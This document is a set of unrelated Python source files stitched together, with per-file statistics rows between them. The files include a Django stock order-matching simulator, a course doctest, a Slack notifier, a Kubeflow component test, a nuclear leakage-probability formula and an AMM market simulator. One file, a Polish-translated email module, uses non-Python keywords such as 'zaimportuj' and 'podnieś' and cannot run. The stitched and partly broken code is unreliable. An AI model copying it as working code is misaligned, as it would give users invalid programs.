date_committed=market.datetime, unique_id=new_order_book_element.unique_id)
if msg.commit_direction == 'a':
# 卖出委托
holding = SimHoldingElem.objects.get(owner=principle, stock_symbol=stock_symbol)
assert msg.commit_vol <= holding.available_vol
holding.frozen_vol += msg.commit_vol
holding.available_vol -= msg.commit_vol
holding.save(update_fields=['frozen_vol', 'available_vol'])
elif msg.commit_direction == 'b':
# 买入委托
principle_object = BaseClient.objects.get(id=principle)
freeze = float(msg.commit_price * msg.commit_vol)
assert freeze <= principle_object.flexible_cash
principle_object.frozen_cash += freeze
principle_object.flexible_cash -= freeze
principle_object.save(update_fields=['frozen_cash', 'flexible_cash'])
return True
def sim_order_book_matching(commission):
"""
将client给出的委托信息与order book中所有order进行撮合交易
"""
assert isinstance(commission, SimCommissionMsg)
assert commission.confirmed is False
stock_symbol = commission.stock_symbol
stock_object = SimStock.objects.get(symbol=stock_symbol)
direction = commission.commit_direction
remaining_vol = commission.commit_vol
market = SimMarket.objects.get(id=1)
if direction == 'a':
# 卖出委托
matching_direction = 'b'
while not stock_object.is_order_book_empty(matching_direction):
best_element = stock_object.get_best_element(matching_direction)
if best_element.price_committed < commission.commit_price:
# 价格不符合要求,结束撮合
break
if remaining_vol == 0:
# 交易量达成要求,结束撮合
break
if remaining_vol >= best_element.vol_committed:
# 交易发生,order book中的此条挂单被完全交易
trade_message = SimTradeMsg(stock_symbol=stock_symbol, initiator=commission.commit_client,
trade_direction=direction, trade_price=best_element.price_committed,
trade_vol=best_element.vol_committed, acceptor=best_element.client,
commission_id=best_element.unique_id, tax_charged=0,
trade_date=market.datetime, trade_tick=market.tick)
# 这应当是并行的
sim_instant_trade(trade_message)
sim_delayed_trade(trade_message)
# 记录交易,并删除order book中的挂单
stock_object.trading_behaviour(direction, best_element.price_committed, best_element.vol_committed,
trade_message.trade_date, trade_message.trade_tick)
remaining_vol -= best_element.vol_committed
best_entry = SimOrderBookEntry.objects.get(id=best_element.entry_belonged)
best_entry.total_vol -= best_element.vol_committed
if best_entry.total_vol == 0:
best_entry.delete()
else:
best_entry.save(update_fields=['total_vol'])
best_element.delete()
else:
# 交易发生,order book中的此条挂单被部分交易
trade_message = SimTradeMsg(stock_symbol=stock_symbol, initiator=commission.commit_client,
trade_direction=direction, trade_price=best_element.price_committed,
trade_vol=remaining_vol, acceptor=best_element.client,
commission_id=best_element.unique_id, tax_charged=0,
trade_date=market.datetime, trade_tick=market.tick)
# 这应当是并行的
sim_instant_trade(trade_message)
sim_delayed_trade(trade_message)
# 记录交易,并调整order book中的挂单
stock_object.trading_behaviour(direction, best_element.price_committed, remaining_vol,
trade_message.trade_date, trade_message.trade_tick)
best_element.vol_committed -= remaining_vol
best_entry = SimOrderBookEntry.objects.get(id=best_element.entry_belonged)
best_entry.total_vol -= remaining_vol
remaining_vol = 0
best_element.save(update_fields=['vol_committed'])
best_entry.save(update_fields=['total_vol'])
elif direction == 'b':
# 买入委托
matching_direction = 'a'
while not stock_object.is_order_book_empty(matching_direction):
best_element = stock_object.get_best_element(matching_direction)
if best_element.price_committed > commission.commit_price:
# 价格不符合要求,结束撮合
break
if remaining_vol == 0:
# 交易量达成要求,结束撮合
break
if remaining_vol >= best_element.vol_committed:
# 交易发生,order book中的此条挂单被完全交易
trade_message = SimTradeMsg(stock_symbol=stock_symbol, initiator=commission.commit_client,
trade_direction=direction, trade_price=best_element.price_committed,
trade_vol=best_element.vol_committed, acceptor=best_element.client,
commission_id=best_element.unique_id, tax_charged=0,
trade_date=market.datetime, trade_tick=market.tick)
# 这应当是并行的
sim_instant_trade(trade_message)
sim_delayed_trade(trade_message)
# 记录交易,并删除order book中的挂单
stock_object.trading_behaviour(direction, best_element.price_committed, best_element.vol_committed,
trade_message.trade_date, trade_message.trade_tick)
remaining_vol -= best_element.vol_committed
best_entry = SimOrderBookEntry.objects.get(id=best_element.entry_belonged)
best_entry.total_vol -= best_element.vol_committed
if best_entry.total_vol == 0:
best_entry.delete()
else:
best_entry.save(update_fields=['total_vol'])
best_element.delete()
else:
# 交易发生,order book中的此条挂单被部分交易
trade_message = SimTradeMsg(stock_symbol=stock_object.symbol, initiator=commission.commit_client,
trade_direction=direction, trade_price=best_element.price_committed,
trade_vol=remaining_vol, acceptor=best_element.client,
commission_id=best_element.unique_id, tax_charged=0,
trade_date=market.datetime, trade_tick=market.tick)
# 这应当是并行的
sim_instant_trade(trade_message)
sim_delayed_trade(trade_message)
# 记录交易,并调整order book中的挂单
stock_object.trading_behaviour(direction, best_element.price_committed, remaining_vol,
trade_message.trade_date, trade_message.trade_tick)
best_element.vol_committed -= remaining_vol
best_entry = SimOrderBookEntry.objects.get(id=best_element.entry_belonged)
best_entry.total_vol -= remaining_vol
remaining_vol = 0
best_element.save(update_fields=['vol_committed'])
best_entry.save(update_fields=['total_vol'])
elif direction == 'c':
# 撤单
assert commission.commission_to_cancel is not None
order_book_element_corr = SimOrderBookElem.objects.get(unique_id=commission.commission_to_cancel)
try:
assert commission.commit_client == order_book_element_corr.client
assert commission.commit_vol <= order_book_element_corr.vol_committed # 委托撤单的数量
order_book_entry = SimOrderBookEntry.objects.get(id=order_book_element_corr.entry_belonged)
order_book_entry.total_vol -= commission.commit_vol
order_book_element_corr.vol_committed -= commission.commit_vol
if order_book_element_corr.vol_committed == 0:
order_book_element_corr.delete()
else:
order_book_element_corr.save(update_fields=['vol_committed'])
if order_book_entry.total_vol == 0:
order_book_entry.delete()
else:
order_book_entry.save(update_fields=['total_vol'])
# 确认撤单成功,删除委托信息,解除冻结
origin_commission = SimCommissionElem.objects.get(unique_id=commission.commission_to_cancel)
if origin_commission.operation == 'a':
holding = SimHoldingElem.objects.get(owner=commission.commit_client, stock_symbol=stock_symbol)
holding.frozen_vol -= commission.commit_vol
holding.available_vol += commission.commit_vol
holding.save(update_fields=['frozen_vol', 'available_vol'])
else:
assert origin_commission.operation == 'b'
freeze = float(commission.commit_price * commission.commit_vol)
client_object = BaseClient.objects.get(id=commission.commit_client)
client_object.frozen_cash -= freeze
client_object.flexible_cash += freeze
client_object.save(update_fields=['frozen_cash', 'flexible_cash'])
origin_commission.vol_committed -= commission.commit_vol
if origin_commission.vol_traded == origin_commission.vol_committed:
origin_commission.delete()
else:
origin_commission.save(update_fields=['vol_committed'])
except AssertionError:
print("撤单失败!")
commission.confirmed = True
commission.save()
return True
else:
raise ValueError
if remaining_vol > 0:
# 市场上所有的挂单都不够买/卖,或不符合交易条件
commission.commit_vol = remaining_vol
commission.confirmed = True
ok = sim_add_commission(commission)
assert ok
else:
commission.confirmed = True
return True
def sim_commission_handler(new_commission, handle_info=False):
"""
委托的处理函数,如果接受的委托message合法,则根据处理情况,在数据库中建立委托项/加入order book/建立成交记录
:param new_commission:新收到的委托信息
:param handle_info:是否打印委托信息
"""
time0 = time.time()
assert isinstance(new_commission, SimCommissionMsg)
if not new_commission.is_valid():
return False
sim_order_book_matching(new_commission)
assert new_commission.confirmed
time1 = time.time()
if handle_info:
print('Commission Handled: symbol-{} {} price-{} vol-{}, Cost {} s.'.format(new_commission.stock_symbol,
new_commission.commit_direction,
new_commission.commit_price,
new_commission.commit_vol,
time1 - time0))
return True
| 45.864173 | 120 | 0.621057 | 3,628 | 0.145254 | 0 | 0 | 0 | 0 | 0 | 0 | 3,876 | 0.155183 |
9eb25cb35ba11321a4478f3939055dd02c0dd60a | 906 | py | Python | project/project3/tests/q3_2_3.py | ds-modules/Colab-demo | cccaff13633f8a5ec697cd4aeca9087f2feec2e4 | [
"BSD-3-Clause"
]
| null | null | null | project/project3/tests/q3_2_3.py | ds-modules/Colab-demo | cccaff13633f8a5ec697cd4aeca9087f2feec2e4 | [
"BSD-3-Clause"
]
| null | null | null | project/project3/tests/q3_2_3.py | ds-modules/Colab-demo | cccaff13633f8a5ec697cd4aeca9087f2feec2e4 | [
"BSD-3-Clause"
]
| null | null | null | test = { 'name': 'q3_2_3',
'points': 1,
'suites': [ { 'cases': [ { 'code': '>>> # this test just checks that your classify_feature_row works correctly.;\n'
'>>> def check(r):\n'
'... t = test_my_features.row(r)\n'
"... return classify(t, train_my_features, train_movies.column('Genre'), 13) == classify_feature_row(t);\n"
'>>> all([check(i) for i in np.arange(13)])\n'
'True',
'hidden': False,
'locked': False}],
'scored': True,
'setup': '',
'teardown': '',
'type': 'doctest'}]}
| 60.4 | 158 | 0.324503 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 406 | 0.448124 |
9eb59f13f0ec2dce6a8b666bbd3d7c93b0067e02 | 695 | py | Python | Lib/email/mime/nonmultipart.py | sireliah/polish-python | 605df4944c2d3bc25f8bf6964b274c0a0d297cc3 | [
"PSF-2.0"
]
| 1 | 2018-06-21T18:21:24.000Z | 2018-06-21T18:21:24.000Z | Lib/email/mime/nonmultipart.py | sireliah/polish-python | 605df4944c2d3bc25f8bf6964b274c0a0d297cc3 | [
"PSF-2.0"
]
| null | null | null | Lib/email/mime/nonmultipart.py | sireliah/polish-python | 605df4944c2d3bc25f8bf6964b274c0a0d297cc3 | [
"PSF-2.0"
]
| null | null | null | # Copyright (C) 2002-2006 Python Software Foundation
# Author: Barry Warsaw
# Contact: [email protected]
"""Base klasa dla MIME type messages that are nie multipart."""
__all__ = ['MIMENonMultipart']
z email zaimportuj errors
z email.mime.base zaimportuj MIMEBase
klasa MIMENonMultipart(MIMEBase):
"""Base klasa dla MIME non-multipart type messages."""
def attach(self, payload):
# The public API prohibits attaching multiple subparts to MIMEBase
# derived subtypes since none of them are, by definition, of content
# type multipart/*
podnieś errors.MultipartConversionError(
'Cannot attach additional subparts to non-multipart/*')
| 30.217391 | 76 | 0.719424 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 446 | 0.640805 |
9eb647f3ff599f7fe9aba98c470407028b7ff5b5 | 682 | py | Python | notifications/providers/slack.py | danidee10/django-notifs | 2712aad90ee1cc7b6735dad6e311e4df6a02b843 | [
"MIT"
]
| 145 | 2017-06-22T20:37:14.000Z | 2022-02-03T21:18:28.000Z | notifications/providers/slack.py | danidee10/django-notifs | 2712aad90ee1cc7b6735dad6e311e4df6a02b843 | [
"MIT"
]
| 67 | 2017-06-23T06:53:32.000Z | 2021-11-13T04:00:27.000Z | notifications/providers/slack.py | danidee10/django-notifs | 2712aad90ee1cc7b6735dad6e311e4df6a02b843 | [
"MIT"
]
| 24 | 2017-06-22T20:37:17.000Z | 2022-02-17T19:52:35.000Z | from notifications import ImproperlyInstalledNotificationProvider
try:
from slack_sdk import WebClient
except ImportError as err:
raise ImproperlyInstalledNotificationProvider(
missing_package='slack_sdk', provider='slack'
) from err
from notifications import default_settings as settings
from . import BaseNotificationProvider
class SlackNotificationProvider(BaseNotificationProvider):
name = 'slack'
def __init__(self, context=dict()):
self.slack_client = WebClient(token=settings.NOTIFICATIONS_SLACK_BOT_TOKEN)
super().__init__(context=context)
def send(self, payload):
self.slack_client.chat_postMessage(**payload)
| 28.416667 | 83 | 0.771261 | 328 | 0.480938 | 0 | 0 | 0 | 0 | 0 | 0 | 25 | 0.036657 |
9eb6d151f5528cdc1c322f9b0068d09d6d965dbb | 114 | py | Python | pinax/points/signals.py | hacklabr/pinax-points | 1133c6d911e9fe9445ff45aebe118bcaf715aae0 | [
"MIT"
]
| 28 | 2015-01-26T07:52:49.000Z | 2022-03-20T17:15:04.000Z | pinax/points/signals.py | hacklabr/pinax-points | 1133c6d911e9fe9445ff45aebe118bcaf715aae0 | [
"MIT"
]
| 15 | 2017-12-04T07:35:49.000Z | 2020-05-21T15:53:20.000Z | pinax/points/signals.py | hacklabr/pinax-points | 1133c6d911e9fe9445ff45aebe118bcaf715aae0 | [
"MIT"
]
| 14 | 2015-02-10T04:27:12.000Z | 2021-10-05T10:27:21.000Z | from django.dispatch import Signal
points_awarded = Signal(providing_args=["target", "key", "points", "source"])
| 28.5 | 77 | 0.745614 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 29 | 0.254386 |
9eb729a54e82db494828c16cbebb47a4ee3adfae | 1,798 | py | Python | symplyphysics/laws/nuclear/fast_non_leakage_probability_from_fermi_age.py | blackyblack/symplyphysics | 4a22ceb7ffbdd8a0b2623a09bfb1a8febf541e4f | [
"MIT"
]
| null | null | null | symplyphysics/laws/nuclear/fast_non_leakage_probability_from_fermi_age.py | blackyblack/symplyphysics | 4a22ceb7ffbdd8a0b2623a09bfb1a8febf541e4f | [
"MIT"
]
| null | null | null | symplyphysics/laws/nuclear/fast_non_leakage_probability_from_fermi_age.py | blackyblack/symplyphysics | 4a22ceb7ffbdd8a0b2623a09bfb1a8febf541e4f | [
"MIT"
]
| null | null | null | from sympy.functions import exp
from symplyphysics import (
symbols, Eq, pretty, solve, Quantity, units, S,
Probability, validate_input, expr_to_quantity, convert_to
)
# Description
## Ptnl (fast non-leakage factor) is the ratio of the number of fast neutrons that do not leak from the reactor
## core during the slowing down process to the number of fast neutrons produced by fissions at all energies.
## Law: Pfnl ≈ e^(-Bg^2 * τth)
## Where:
## e - exponent.
## Bg^2 - geometric buckling.
## See [geometric buckling](./buckling/geometric_buckling_from_neutron_flux.py) implementation.
## τth - neutron Fermi age.
## The Fermi age is related to the distance traveled during moderation, just as the diffusion length is for
## thermal neutrons. The Fermi age is the same quantity as the slowing-down length squared (Ls^2).
## Pfnl - fast non-leakage probability.
geometric_buckling = symbols('geometric_buckling')
neutron_fermi_age = symbols('neutron_fermi_age')
fast_non_leakage_probability = symbols('thermal_non_leakage_probability')
law = Eq(fast_non_leakage_probability, exp(-1 * geometric_buckling * neutron_fermi_age))
def print():
return pretty(law, use_unicode=False)
@validate_input(geometric_buckling_=(1 / units.length**2), neutron_fermi_age_=units.length**2)
def calculate_probability(geometric_buckling_: Quantity, neutron_fermi_age_: Quantity) -> Probability:
result_probability_expr = solve(law, fast_non_leakage_probability, dict=True)[0][fast_non_leakage_probability]
result_expr = result_probability_expr.subs({
geometric_buckling: geometric_buckling_,
neutron_fermi_age: neutron_fermi_age_})
result_factor = expr_to_quantity(result_expr, 'fast_non_leakage_factor')
return Probability(convert_to(result_factor, S.One).n())
| 47.315789 | 114 | 0.775306 | 0 | 0 | 0 | 0 | 596 | 0.330744 | 0 | 0 | 790 | 0.438402 |
9eb7a903f72b60e9e3df9e532475115dd09aef7e | 599 | py | Python | 3. Python Advanced (September 2021)/3.1 Python Advanced (September 2021)/12. Exercise - File Handling/02_line_numbers.py | kzborisov/SoftUni | ccb2b8850adc79bfb2652a45124c3ff11183412e | [
"MIT"
]
| 1 | 2021-02-07T07:51:12.000Z | 2021-02-07T07:51:12.000Z | 3. Python Advanced (September 2021)/3.1 Python Advanced (September 2021)/12. Exercise - File Handling/02_line_numbers.py | kzborisov/softuni | 9c5b45c74fa7d9748e9b3ea65a5ae4e15c142751 | [
"MIT"
]
| null | null | null | 3. Python Advanced (September 2021)/3.1 Python Advanced (September 2021)/12. Exercise - File Handling/02_line_numbers.py | kzborisov/softuni | 9c5b45c74fa7d9748e9b3ea65a5ae4e15c142751 | [
"MIT"
]
| null | null | null | import re
def count_letters(text):
return len(re.findall(r"[a-zA-Z]", text))
def count_punctuation(text):
return len([x for x in text if x in '!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~'])
lines = []
with open("text.txt", "r") as f:
content = f.readlines()
for index, line in enumerate(content):
letters_count = count_letters(line)
punctuation = count_punctuation(line)
line = line.strip("\n")
lines.append(f"Line {index + 1}: {line} ({letters_count})({punctuation})\n")
with open("output.txt", "w") as f:
for line in lines:
f.write(line)
| 23.96 | 84 | 0.580968 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 141 | 0.235392 |
9eb81dc7bd07da6f0a064dae1f82cb5f9f4c811b | 422 | py | Python | app/auth/forms.py | jakhax/esp9266_rfid_lock | e9c25628a023c8d6005a136e240ca1a36589fd36 | [
"MIT"
]
| 2 | 2020-11-10T09:16:21.000Z | 2021-12-15T07:27:17.000Z | app/auth/forms.py | jakhax/consecutive_normal_punches | e9c25628a023c8d6005a136e240ca1a36589fd36 | [
"MIT"
]
| null | null | null | app/auth/forms.py | jakhax/consecutive_normal_punches | e9c25628a023c8d6005a136e240ca1a36589fd36 | [
"MIT"
]
| null | null | null | from flask_wtf import FlaskForm
from wtforms import StringField,SubmitField,BooleanField,PasswordField
from wtforms.validators import Required,DataRequired,Length
class LoginForm(FlaskForm):
username = StringField('username', validators=[DataRequired(), Length(1, 32)])
password = PasswordField('Password', validators=[DataRequired()])
remember = BooleanField('Remember me')
submit = SubmitField('Log in') | 46.888889 | 82 | 0.779621 | 258 | 0.611374 | 0 | 0 | 0 | 0 | 0 | 0 | 41 | 0.097156 |
9eb981e2b99c90652643fa12268a2ebf31a607f2 | 929 | py | Python | hub/sensorhub/models/user_agent.py | kblum/sensor-hub | 6b766ca59be74ae1a8d3d42afe048d04b6a0c546 | [
"MIT"
]
| null | null | null | hub/sensorhub/models/user_agent.py | kblum/sensor-hub | 6b766ca59be74ae1a8d3d42afe048d04b6a0c546 | [
"MIT"
]
| null | null | null | hub/sensorhub/models/user_agent.py | kblum/sensor-hub | 6b766ca59be74ae1a8d3d42afe048d04b6a0c546 | [
"MIT"
]
| null | null | null | from django.db import models
from . import TimestampedModel
class UserAgent(TimestampedModel):
"""
Representation of HTTP user agent string from reading API request.
Exists as a separate model for database normalisation.
"""
user_agent_string = models.TextField(db_index=True, unique=True, null=False, blank=False)
@staticmethod
def get_or_create_user_agent(user_agent_string, save=False):
if not user_agent_string:
return None
try:
# attempt to load user agent from user agent string
return UserAgent.objects.get(user_agent_string=user_agent_string)
except UserAgent.DoesNotExist:
# create new user agent
user_agent = UserAgent(user_agent_string=user_agent_string)
if save:
user_agent.save()
return user_agent
def __str__(self):
return self.user_agent_string
| 32.034483 | 93 | 0.678149 | 866 | 0.932185 | 0 | 0 | 523 | 0.562971 | 0 | 0 | 215 | 0.231432 |
9eb9fac0aba71cd2544a8102ad03715608f8d6b1 | 428 | py | Python | sortingAlgorithm/pigeonHoleSort.py | slowy07/pythonApps | 22f9766291dbccd8185035745950c5ee4ebd6a3e | [
"MIT"
]
| 10 | 2020-10-09T11:05:18.000Z | 2022-02-13T03:22:10.000Z | sortingAlgorithm/pigeonHoleSort.py | khairanabila/pythonApps | f90b8823f939b98f7bf1dea7ed35fe6e22e2f730 | [
"MIT"
]
| null | null | null | sortingAlgorithm/pigeonHoleSort.py | khairanabila/pythonApps | f90b8823f939b98f7bf1dea7ed35fe6e22e2f730 | [
"MIT"
]
| 6 | 2020-11-26T12:49:43.000Z | 2022-03-06T06:46:43.000Z | def pigeonHoleSort(nums):
minNumbers = min(nums)
maxNumbers = max(nums)
size = maxNumbers - minNumbers + 1
holes = [0] * size
for x in nums:
holes[x - minNumbers] += 1
i = 0
for count in range(size):
while holes[count] > 0:
holes[count] -= 1
nums[i] = count + minNumbers
i += 1
nums = [12,26,77,22,88,1]
print(pigeonHoleSort(nums))
print(nums)
| 20.380952 | 40 | 0.546729 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
9eba0cf24a0b17206785479fbe34def5787d6765 | 345 | py | Python | service/utils/parsers.py | psorianom/csv_detective_api | 7c96f497374d842226a95a26cb6627ac22cd799b | [
"MIT"
]
| 2 | 2020-02-04T05:24:56.000Z | 2021-05-05T17:22:55.000Z | service/utils/parsers.py | psorianom/csv_detective_api | 7c96f497374d842226a95a26cb6627ac22cd799b | [
"MIT"
]
| 10 | 2019-10-24T13:29:59.000Z | 2022-02-26T17:06:15.000Z | service/utils/parsers.py | psorianom/csv_detective_api | 7c96f497374d842226a95a26cb6627ac22cd799b | [
"MIT"
]
| 2 | 2019-12-30T23:26:53.000Z | 2020-03-27T17:23:28.000Z | # parsers.py
from werkzeug.datastructures import FileStorage
from flask_restplus import reqparse
file_upload = reqparse.RequestParser()
file_upload.add_argument('resource_csv',
type=FileStorage,
location='files',
required=True,
help='CSV file') | 34.5 | 47 | 0.585507 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 43 | 0.124638 |
9ebb0d752144dce45cafae8a4dd28aecf263593a | 4,410 | py | Python | sdk/python/kfp/components/yaml_component_test.py | johnmacnamararseg/pipelines | 340318625c527836af1c9abc0fd0d76c0a466333 | [
"Apache-2.0"
]
| null | null | null | sdk/python/kfp/components/yaml_component_test.py | johnmacnamararseg/pipelines | 340318625c527836af1c9abc0fd0d76c0a466333 | [
"Apache-2.0"
]
| 1 | 2020-02-06T12:53:44.000Z | 2020-02-06T12:53:44.000Z | sdk/python/kfp/components/yaml_component_test.py | johnmacnamararseg/pipelines | 340318625c527836af1c9abc0fd0d76c0a466333 | [
"Apache-2.0"
]
| null | null | null | # Copyright 2021 The Kubeflow Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for kfp.components.yaml_component."""
import os
import tempfile
import textwrap
import unittest
from unittest import mock
import requests
from kfp.components import structures
from kfp.components import yaml_component
SAMPLE_YAML = textwrap.dedent("""\
components:
comp-component-1:
executorLabel: exec-component-1
inputDefinitions:
parameters:
input1:
parameterType: STRING
outputDefinitions:
parameters:
output1:
parameterType: STRING
deploymentSpec:
executors:
exec-component-1:
container:
command:
- sh
- -c
- 'set -ex
echo "$0" > "$1"'
- '{{$.inputs.parameters[''input1'']}}'
- '{{$.outputs.parameters[''output1''].output_file}}'
image: alpine
pipelineInfo:
name: component-1
root:
dag:
tasks:
component-1:
cachingOptions:
enableCache: true
componentRef:
name: comp-component-1
inputs:
parameters:
input1:
componentInputParameter: input1
taskInfo:
name: component-1
inputDefinitions:
parameters:
input1:
parameterType: STRING
schemaVersion: 2.1.0
sdkVersion: kfp-2.0.0-alpha.3
""")
class YamlComponentTest(unittest.TestCase):
def test_load_component_from_text(self):
component = yaml_component.load_component_from_text(SAMPLE_YAML)
self.assertEqual(component.component_spec.name, 'component-1')
self.assertEqual(component.component_spec.outputs,
{'output1': structures.OutputSpec(type='String')})
self.assertEqual(component._component_inputs, {'input1'})
self.assertEqual(component.name, 'component-1')
self.assertEqual(
component.component_spec.implementation.container.image, 'alpine')
def test_load_component_from_file(self):
with tempfile.TemporaryDirectory() as tmpdir:
path = os.path.join(tmpdir, 'sample_yaml.yaml')
with open(path, 'w') as f:
f.write(SAMPLE_YAML)
component = yaml_component.load_component_from_file(path)
self.assertEqual(component.component_spec.name, 'component-1')
self.assertEqual(component.component_spec.outputs,
{'output1': structures.OutputSpec(type='String')})
self.assertEqual(component._component_inputs, {'input1'})
self.assertEqual(component.name, 'component-1')
self.assertEqual(
component.component_spec.implementation.container.image, 'alpine')
def test_load_component_from_url(self):
component_url = 'https://raw.githubusercontent.com/some/repo/components/component_group/component.yaml'
def mock_response_factory(url, params=None, **kwargs):
if url == component_url:
response = requests.Response()
response.url = component_url
response.status_code = 200
response._content = SAMPLE_YAML
return response
raise RuntimeError('Unexpected URL "{}"'.format(url))
with mock.patch('requests.get', mock_response_factory):
component = yaml_component.load_component_from_url(component_url)
self.assertEqual(component.component_spec.name, 'component-1')
self.assertEqual(component.component_spec.outputs,
{'output1': structures.OutputSpec(type='String')})
self.assertEqual(component._component_inputs, {'input1'})
self.assertEqual(component.name, 'component-1')
self.assertEqual(
component.component_spec.implementation.container.image,
'alpine')
if __name__ == '__main__':
unittest.main()
| 34.453125 | 111 | 0.654649 | 2,493 | 0.565306 | 0 | 0 | 0 | 0 | 0 | 0 | 1,966 | 0.445805 |
9ebbdb1a7760f5a35b7e2094efb06933644ff5ca | 10,548 | py | Python | cpmm.py | wallfair-organization/amm-sim | 0ae8584563dd44162a8e2407382d250b02474704 | [
"MIT"
]
| null | null | null | cpmm.py | wallfair-organization/amm-sim | 0ae8584563dd44162a8e2407382d250b02474704 | [
"MIT"
]
| null | null | null | cpmm.py | wallfair-organization/amm-sim | 0ae8584563dd44162a8e2407382d250b02474704 | [
"MIT"
]
| null | null | null | #
# Constant Price Market Making Simulator
#
# simulate different liquidity provision and trading strategies
#
from typing import Tuple
import csv
import numpy as np
import pandas as pd
from numpy.random import binomial, default_rng
# TODO: switch to decimal type and control quantization. numeric errors will kill us quickly
class CPMM(object):
def __init__(self, fee_fraction = 0, fee_to_liquidity_fraction = 0) -> None:
# assert(fee_fraction >= fee_to_liquidity_fraction)
# amount of initial liquidity provided
self.initial_liquidity = 0
# total amount of liquidity
self.liquidity = 0
# total amount of collateral token
self.lp_token = 0
# yes tokens in the pool
self.lp_yes = 0
# no tokens in the pool
self.lp_no = 0
# outstanding tokens held by LP
self.outstanding_yes = 0
self.outstanding_no = 0
self.fee_pool = 0
self.history = []
self.fee_fraction = fee_fraction
self.fee_to_liquidity_fraction = fee_to_liquidity_fraction # how much from the fee is reinvested to liqudity provision
def create_event(self, intial_liquidity, initial_yes_to_no = 1) -> Tuple[int, float]:
assert(initial_yes_to_no > 0)
self.initial_liquidity = intial_liquidity
rv = self._add_liquidity(intial_liquidity, initial_yes_to_no)
n_p = self.lp_yes / self.lp_no
# print(f"invariant P {initial_yes_to_no} {n_p}")
assert(abs(initial_yes_to_no - n_p) < 0.000001)
return rv
def add_liquidity(self, amount) -> Tuple[int, float]:
assert(self.lp_token > 0)
# yes to no must be invariant when liquidity is added
p = self.lp_yes / self.lp_no
rv = self._add_liquidity(amount, p)
n_p = self.lp_yes / self.lp_no
# assert invariant, we use float and disregard rounding so must be within e ~ 0
# print(f"invariant P {p} {n_p}")
assert(abs(p - n_p) < 0.000001)
return rv
def _add_liquidity(self, amount, yes_to_no) -> Tuple[int, float]:
# print("adding liquidity:", amount)
self.liquidity += amount
self.lp_token += amount
# get token type from the ratio
type = 1 if yes_to_no >= 1 else 0
if type:
# more into YES bucket, NO is returned
old_lp_no = self.lp_no
self.lp_no = (amount + self.lp_yes) / yes_to_no
self.lp_yes += amount
tokens_return = amount + old_lp_no - self.lp_no
self.outstanding_no += tokens_return
else:
# more into NO bucket, YES is returned
old_lp_yes = self.lp_yes
self.lp_yes = (amount + self.lp_no) * yes_to_no
self.lp_no += amount
tokens_return = amount + old_lp_yes - self.lp_yes
self.outstanding_yes += tokens_return
entry = ["add", "liquidity", amount, 0, yes_to_no, 0, tokens_return, self.lp_yes, self.lp_no, self.lp_token, self.liquidity, self.fee_pool, 0 ,0]
self._add_history(entry)
# should return amount of outcome token
return (type, amount)
# def remove_liquidity(amount):
def buy_token(self, type, original_amount) -> Tuple[int, float]: #yes=1 | no = 0
# take fee before any operation and store in fee_pool
fee = original_amount * self.fee_fraction
amount = original_amount - fee
self.fee_pool += fee
# adding fee_to_liquidity fraction to liquidity fee pool
# note: liquidity is provided before buy such that added liquidity is available for current transaction
if (self.fee_to_liquidity_fraction > 0):
reinvest_fee = fee * self.fee_to_liquidity_fraction
self.add_liquidity(reinvest_fee)
# keep invariant
k = (self.lp_yes * self.lp_no)
# add liquidity
self.lp_token += amount
if type:
tokens_return, x = self.calc_buy(type, amount)
buy_price_yes = amount / tokens_return
# calc slippage
slippage_yes = self.calc_slippage(type, amount)
assert (slippage_yes > 0), f"slippage_yes {slippage_yes} <= 0"
# remove returned token form the pool, keep all no tokens
self.lp_yes += x
self.lp_no += amount
entry = ["buy", "yes", original_amount, fee, buy_price_yes, slippage_yes, tokens_return, self.lp_yes, self.lp_no, self.lp_token, self.liquidity, self.fee_pool, 0, 0]
else:
tokens_return, x = self.calc_buy(type, amount)
buy_price_no = amount / tokens_return
slippage_no = self.calc_slippage(type, amount)
assert (slippage_no > 0), f"slippage_no {slippage_no} <= 0"
# remove returned token form the pool, keep all yes tokens
self.lp_no += x
self.lp_yes += amount
entry = ["buy", "no", original_amount, fee, buy_price_no, slippage_no, tokens_return, self.lp_yes, self.lp_no, self.lp_token, self.liquidity, self.fee_pool, 0, 0]
# assert invariant, we use float and disregard rounding so must be within e ~ 0
inv_div = abs(k - (self.lp_yes * self.lp_no))
# use variable epsilon - float numbers suck due to scaling
inv_eps = min(self.lp_no, self.lp_yes) / 100000000
if inv_div > inv_eps :
print(f"invariant K {k} {self.lp_yes * self.lp_no} == {inv_div}, lp_yes {self.lp_yes} lp_no {self.lp_no} eps {inv_eps}")
assert(inv_div < inv_eps)
impermanent_loss = self.calc_impermanent_loss()
assert(impermanent_loss >= 0)
# outstanding yes/no token may be converted at event outcome to reward or immediately traded
outstanding_token = self.calc_outstanding_token()
# impermanent loss at last position in history entry
entry[-2] = impermanent_loss
entry[-1] = outstanding_token[1]
self._add_history(entry)
return (type, tokens_return)
def calc_withdrawable_liquidity(self) -> float:
# collateral taken from the pool and tokens returned when adding liquidity
return min(self.lp_yes + self.outstanding_yes, self.lp_no + self.outstanding_no)
def calc_payout(self) -> float:
# how big is reward after all liquidity is removed
return self.lp_token - self.calc_withdrawable_liquidity()
def calc_outstanding_token(self) -> Tuple[int, float]:
# outcome tokens going to LP on top of removed liquidity
withdraw_token = self.calc_withdrawable_liquidity()
total_yes = self.lp_yes + self.outstanding_yes
total_no = self.lp_no + self.outstanding_no
if total_yes > total_no:
outstanding_token = (1, total_yes - withdraw_token)
else:
outstanding_token = (0, total_no - withdraw_token)
return outstanding_token
def calc_impermanent_loss(self) -> float:
withdraw_token = self.calc_withdrawable_liquidity()
return self.liquidity - withdraw_token
def calc_buy(self, type, amount) -> Tuple[float, float]:
k = (self.lp_yes * self.lp_no)
if type:
x = k / (self.lp_no + amount) - self.lp_yes
else:
x = k / (self.lp_yes + amount) - self.lp_no
# (tokens returned to the user, amm pool delta)
return amount - x, x
